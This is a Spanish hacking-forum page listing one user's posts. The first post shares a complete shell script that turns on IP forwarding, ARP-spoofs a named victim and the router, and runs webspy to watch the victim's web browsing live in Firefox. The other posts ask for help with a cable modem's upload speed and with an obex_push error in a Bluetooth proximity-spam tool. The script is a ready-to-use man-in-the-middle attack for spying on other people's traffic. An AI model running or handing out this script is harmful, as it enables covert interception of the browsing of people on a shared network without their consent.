elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Hacking / Re: Problema esnifando paquetes con dsniff en linux en: 10 Octubre 2010, 10:38 am
Me hice este pequeño script que a mi me va fenómeno.
Capturas el tráfico, arranca el firefox y te muestra en tiempo real las webs que está visitando la víctima.

Descarga

Código:

#!/bin/sh

# sniff.sh
# 22/11/2007 Created by CocoSwit
#
# sniff.sh is a sniffing web script for local-red
# Copy, use it, modify, do what you want with, but under ALWAYS YOUR responsibility.
# sniff.sh es un script para sniffing web en una red local
# Copialo, usalo, modificalo, haz con el lo que quieras, pero SIEMPRE bajo TU responsabilidad.


# La tarjeta de red es $3 , la Ip victima es $1  y la ip del router es $2

if [ $# -ne 3 ]
   then
   echo
   echo ERROR: faltan parametros
   echo
   echo Usa: $0 ip-victima ip-router tarjeta-red
   echo Ejemplo: $0 192.168.1.101 192.168.1.1 eth1
   exit
else
   # Activamos el ip_forward para poder reenviar el trafico a la victima
   echo 1 > /proc/sys/net/ipv4/ip_forward
   echo La tarjeta de red es $3 , la Ip victima es $1  y la ip del router es $2
   # Ejecutamos en un terminal arpspoof entre la ip victima y la ip de la puerta de enlaze, mas otro arpspoof entre la puerta de enlace y la victima, arrancamos el firefox y capturamos el trafico.
   xterm -bg black -fg green -e arpspoof -i $3 -t $1 $2 & xterm -bg black -fg green -e arpspoof -i $3 -t $2 $1 & firefox & xterm -bg black -fg blue -e webspy -i $3 $1
fi

2  Informática / Tutoriales - Documentación / Re: Pasos detallados para clonar un Cablemodem en: 7 Julio 2007, 12:27 pm
Hola a todos, me he leido casi todo el post, pero no he encontrado lo que busco tengo un SB4200B, con firmware original todo normal de fabrica, pero necesito modificar la velocidad de subida solo la de subida, hay alguna manera de hacerlo.

gracias y saludos
3  Comunicaciones / Hacking Mobile / Re: BlueZSpammer: Marketing de proximidad con un HotSpot Bluetooth casero en: 7 Octubre 2006, 19:42 pm
Pues despues de intentarlo no puedo ejecutar obex_push no hay manera openobex-apps no lo trae, y lo unico que encuentro en google es mas de lo mismo, pero no funciona ni como user ni como root.

Gracias y salu2
4  Comunicaciones / Hacking Mobile / Re: BlueZSpammer: Marketing de proximidad con un HotSpot Bluetooth casero en: 1 Octubre 2006, 20:18 pm
Lo he mirado y si lo tengo instalado, por si acaso lo he vuelto instalar y sale el mismo error.
5  Comunicaciones / Hacking Mobile / Re: BlueZSpammer: Marketing de proximidad con un HotSpot Bluetooth casero en: 1 Octubre 2006, 20:04 pm
Hola a todos perdonad mi ignorancia pero, me da un error a la hora de enviar el fichero, tengo que decir que llevo con Ubuntu instalado en el portatil como 1 semana y es la primera vez que uso un SO linux.

Me detecta perfectamente un nokia n70 que tengo pero cuando va a enviar el fichero da un error "sh: obex_push: orden no encontrada" tengo instalado openobex 1.0. a que puede ser debido ese error.

gracias y saludos, David.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines